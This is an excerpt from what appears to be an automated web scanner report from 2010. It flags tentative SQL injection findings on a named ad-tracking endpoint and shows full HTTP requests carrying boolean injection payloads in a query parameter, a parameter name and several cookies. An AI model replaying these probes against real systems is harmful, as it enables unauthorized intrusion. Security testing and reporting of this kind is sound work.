GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=62&k=san+jose:236,mercury+news:192,jose+mercury:160,news:86,mercury+new:80,30+worth:64,rosies+posies:64,newspaper+delivery:64,jose:59,shopping:54,new:43,silicon+valley:40,mercury:40,news+silicon:40,high+speed:40,chrome+os:40,bay+area:40,news+breaking:40,breaking+news:40,local+events:40,rosies+posie:32,clara+county:32,san+francisco:32,santa+clara:32,speed+rail:32,biz+break:32,os+notebook:28,los+gatos:24,site+map:24,area+living:24,real+estate:24,google+chrome:24,notebook+nothing:24,elizabeth+edwards:24,subscriber+services:24,chrome+o:20,breaking+new:20,local+event:20,newspaper:16,delivery:16,&t=Home+-+San+Jose+Mercury+News HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; khaos=GFEPV6UK-2-91QT; cd=false'%20and%201%3d2--%20; dq=9|1|8|0; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%262372%3D1%264894%3D1%264212%3D1%265446%3D1; ruid=254cb0a61dae79de123c116f^6^1291762372^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk=5833/7750; rdk2=0; csi2=441745.js^1^1291762372^1291762372

Response 2

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:18 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.124. http://tap.rubiconproject.com/oz/sensor [cd parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The cd parameter appears to be vulnerable to SQL injection attacks. The payloads 11807099'%20or%201%3d1--%20 and 11807099'%20or%201%3d2--%20 were each submitted in the cd parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false11807099'%20or%201%3d1--%20&xt=58&k=san+jose:236,mercury+news:192,jose+mercury:160,news:86,mercury+new:80,30+worth:64,rosies+posies:64,newspaper+delivery:64,jose:59,shopping:54,new:43,news+breaking:40,silicon+valley:40,breaking+news:40,local+events:40,mercury:40,high+speed:40,chrome+os:40,bay+area:40,news+silicon:40,rosies+posie:32,biz+break:32,speed+rail:32,santa+clara:32,clara+county:32,san+francisco:32,os+notebook:28,area+living:24,real+estate:24,los+gatos:24,site+map:24,google+chrome:24,notebook+nothing:24,elizabeth+edwards:24,subscriber+services:24,chrome+o:20,local+event:20,breaking+new:20,high:16,flowers:16,&t=Home+-+San+Jose+Mercury+News HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; khaos=GFEPV6UK-2-91QT; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1; cd=false; dq=15|1|14|0; csi9=2617283.js^1^1291762442^1291762442&441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; ruid=254cb0a61dae79de123c116f^7^1291762640^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk=5833/7750; rdk2=0; csi2=3181577.js^3^1291762417^1291762640&3137272.js^3^1291762416^1291762420&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390

Response 1

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:01 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 00:32:01 GMT; Path=/
Set-Cookie: dq=16|1|15|0; Expires=Thu, 08-Dec-2011 00:32:01 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false11807099'%20or%201%3d2--%20&xt=58&k=san+jose:236,mercury+news:192,jose+mercury:160,news:86,mercury+new:80,30+worth:64,rosies+posies:64,newspaper+delivery:64,jose:59,shopping:54,new:43,news+breaking:40,silicon+valley:40,breaking+news:40,local+events:40,mercury:40,high+speed:40,chrome+os:40,bay+area:40,news+silicon:40,rosies+posie:32,biz+break:32,speed+rail:32,santa+clara:32,clara+county:32,san+francisco:32,os+notebook:28,area+living:24,real+estate:24,los+gatos:24,site+map:24,google+chrome:24,notebook+nothing:24,elizabeth+edwards:24,subscriber+services:24,chrome+o:20,local+event:20,breaking+new:20,high:16,flowers:16,&t=Home+-+San+Jose+Mercury+News HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; khaos=GFEPV6UK-2-91QT; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1; cd=false; dq=15|1|14|0; csi9=2617283.js^1^1291762442^1291762442&441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; ruid=254cb0a61dae79de123c116f^7^1291762640^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk=5833/7750; rdk2=0; csi2=3181577.js^3^1291762417^1291762640&3137272.js^3^1291762416^1291762420&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390

Response 2

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:01 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.125. http://tap.rubiconproject.com/oz/sensor [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=46&k=gift+wrapping:160,christmas+past:144,gift+bags:88,gift:85,past+contracostatimes:80,contra+costa:72,mom's+5:64,mom+makes:64,local+mom:64,costa+times:64,card+debt:64,5+wrinkle:64,6762+month:64,makes+6762:64,credit+card:64,banks+forced:64,wrinkle+trick:64,houston+mom's:64,forgive+credit:64,wrapping+service:56,wrapping:50,cars+homes:40,el+cerrito:40,albany+hot:40,bay+area:40,walnut+creek:40,richmond+jobs:40,times+antioch:40,apartments+el:40,greener+times:40,creek+richmond:40,concord+walnut:40,cerrito+albany:40,wrapping+falls:40,homes+apartments:40,brentwood+concord:40,antioch+brentwood:40,past+contracostatime:40,jobs+cars:40,christmas:36,&t=Ghost+of+Christmas+past+-+ContraCostaTimes.com&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; khaos=GFEPV6UK-2-91QT; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%262372%3D1%264894%3D1%264212%3D1%265446%3D1; ruid=254cb0a61dae79de123c116f^6^1291762372^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; cd=false; dq=10|1|9|0; rdk9=0; csi9=3172324.js^2^1291762387^1291762395; rdk=5833/7750; rdk2=0; csi2=2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390

Response 1

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:51 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 00:32:51 GMT; Path=/
Set-Cookie: dq=11|1|10|0; Expires=Thu, 08-Dec-2011 00:32:51 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=46&k=gift+wrapping:160,christmas+past:144,gift+bags:88,gift:85,past+contracostatimes:80,contra+costa:72,mom's+5:64,mom+makes:64,local+mom:64,costa+times:64,card+debt:64,5+wrinkle:64,6762+month:64,makes+6762:64,credit+card:64,banks+forced:64,wrinkle+trick:64,houston+mom's:64,forgive+credit:64,wrapping+service:56,wrapping:50,cars+homes:40,el+cerrito:40,albany+hot:40,bay+area:40,walnut+creek:40,richmond+jobs:40,times+antioch:40,apartments+el:40,greener+times:40,creek+richmond:40,concord+walnut:40,cerrito+albany:40,wrapping+falls:40,homes+apartments:40,brentwood+concord:40,antioch+brentwood:40,past+contracostatime:40,jobs+cars:40,christmas:36,&t=Ghost+of+Christmas+past+-+ContraCostaTimes.com&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; khaos=GFEPV6UK-2-91QT; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%262372%3D1%264894%3D1%264212%3D1%265446%3D1; ruid=254cb0a61dae79de123c116f^6^1291762372^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; cd=false; dq=10|1|9|0; rdk9=0; csi9=3172324.js^2^1291762387^1291762395; rdk=5833/7750; rdk2=0; csi2=2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390

Response 2

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:51 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.126. http://tap.rubiconproject.com/oz/sensor [put_1986 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_1986 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the put_1986 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor HTTP/1.1
Host: tap.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=; rdk9=0; csi9=2617283.js^1^1291762442^1291762442&441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1185=9222939536171538409; au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; khaos=GFEPV6UK-2-91QT; ruid=254cb0a61dae79de123c116f^7^1291762640^2927222290; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1; csi2=3181577.js^3^1291762417^1291762640&3137272.js^3^1291762416^1291762420&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390; rdk=5833/7750; put_2081=CC-00000000320688809; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; put_1512=%5Bnil%5D; put_1986=1253520181866309356'%20and%201%3d1--%20; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk2=0; dq=16|1|15|0; put_1994=13371vxjy3fi8; cd=false;

Response 1

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 01:28:01 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 01:28:02 GMT; Path=/
Set-Cookie: dq=17|1|16|0; Expires=Thu, 08-Dec-2011 01:28:02 GMT; Path=/
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 01:28:02 GMT; Path=/
Set-Cookie: lm="8 Dec 2010 01:28:02 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor HTTP/1.1
Host: tap.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=; rdk9=0; csi9=2617283.js^1^1291762442^1291762442&441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1185=9222939536171538409; au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; khaos=GFEPV6UK-2-91QT; ruid=254cb0a61dae79de123c116f^7^1291762640^2927222290; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1; csi2=3181577.js^3^1291762417^1291762640&3137272.js^3^1291762416^1291762420&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390; rdk=5833/7750; put_2081=CC-00000000320688809; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; put_1512=%5Bnil%5D; put_1986=1253520181866309356'%20and%201%3d2--%20; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk2=0; dq=16|1|15|0; put_1994=13371vxjy3fi8; cd=false;

Response 2

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 01:28:01 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.127. http://tap.rubiconproject.com/oz/sensor [put_1994 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_1994 cookie appears to be vulnerable to SQL injection attacks. The payloads 19221418'%20or%201%3d1--%20 and 19221418'%20or%201%3d2--%20 were each submitted in the put_1994 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=58&k=san+jose:236,mercury+news:192,jose+mercury:160,news:86,mercury+new:80,30+worth:64,rosies+posies:64,newspaper+delivery:64,jose:59,shopping:54,new:43,news+breaking:40,silicon+valley:40,breaking+news:40,local+events:40,mercury:40,high+speed:40,chrome+os:40,bay+area:40,news+silicon:40,rosies+posie:32,biz+break:32,speed+rail:32,santa+clara:32,clara+county:32,san+francisco:32,os+notebook:28,area+living:24,real+estate:24,los+gatos:24,site+map:24,google+chrome:24,notebook+nothing:24,elizabeth+edwards:24,subscriber+services:24,chrome+o:20,local+event:20,breaking+new:20,high:16,flowers:16,&t=Home+-+San+Jose+Mercury+News HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi819221418'%20or%201%3d1--%20; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; khaos=GFEPV6UK-2-91QT; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1; cd=false; dq=15|1|14|0; csi9=2617283.js^1^1291762442^1291762442&441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; ruid=254cb0a61dae79de123c116f^7^1291762640^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk=5833/7750; rdk2=0; csi2=3181577.js^3^1291762417^1291762640&3137272.js^3^1291762416^1291762420&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390

Response 1

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:22 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 00:32:22 GMT; Path=/
Set-Cookie: dq=16|1|15|0; Expires=Thu, 08-Dec-2011 00:32:22 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=58&k=san+jose:236,mercury+news:192,jose+mercury:160,news:86,mercury+new:80,30+worth:64,rosies+posies:64,newspaper+delivery:64,jose:59,shopping:54,new:43,news+breaking:40,silicon+valley:40,breaking+news:40,local+events:40,mercury:40,high+speed:40,chrome+os:40,bay+area:40,news+silicon:40,rosies+posie:32,biz+break:32,speed+rail:32,santa+clara:32,clara+county:32,san+francisco:32,os+notebook:28,area+living:24,real+estate:24,los+gatos:24,site+map:24,google+chrome:24,notebook+nothing:24,elizabeth+edwards:24,subscriber+services:24,chrome+o:20,local+event:20,breaking+new:20,high:16,flowers:16,&t=Home+-+San+Jose+Mercury+News HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi819221418'%20or%201%3d2--%20; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; khaos=GFEPV6UK-2-91QT; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1; cd=false; dq=15|1|14|0; csi9=2617283.js^1^1291762442^1291762442&441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; ruid=254cb0a61dae79de123c116f^7^1291762640^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk=5833/7750; rdk2=0; csi2=3181577.js^3^1291762417^1291762640&3137272.js^3^1291762416^1291762420&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390

Response 2

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:22 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.128. http://tap.rubiconproject.com/oz/sensor [rpb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The rpb cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the rpb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=31&k=mercury+news:176,san+jose:160,news:158,rss+feed:136,rss+feeds:128,mercury+new:88,rss+san:80,columns:80,jose+mercury:80,special+reports:80,new:79,rss+terms:64,life+style:64,find+us:64,local+news:64,news+video:64,food+dining:64,video:64,sports+video:64,entertainment+video:64,company+news:64,mobile+device:64,college+teams:64,follow+us:64,business+video:64,opinion+editorial:64,feed:59,sports:48,twitter:48,mercury:44,jose:40,real+simple:40,syndicate+feeds:40,business:40,column:40,simple+syndicate:40,rss+real:40,news+rss:40,feeds:34,access:32,&t=RSS+-+San+Jose+Mercury+News HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/rss
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; ruid=254cb0a61dae79de123c116f^6^1291762372^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; khaos=GFEPV6UK-2-91QT; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1'%20and%201%3d1--%20; rdk9=1; csi9=441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; rdk=5833/7750; rdk2=0; 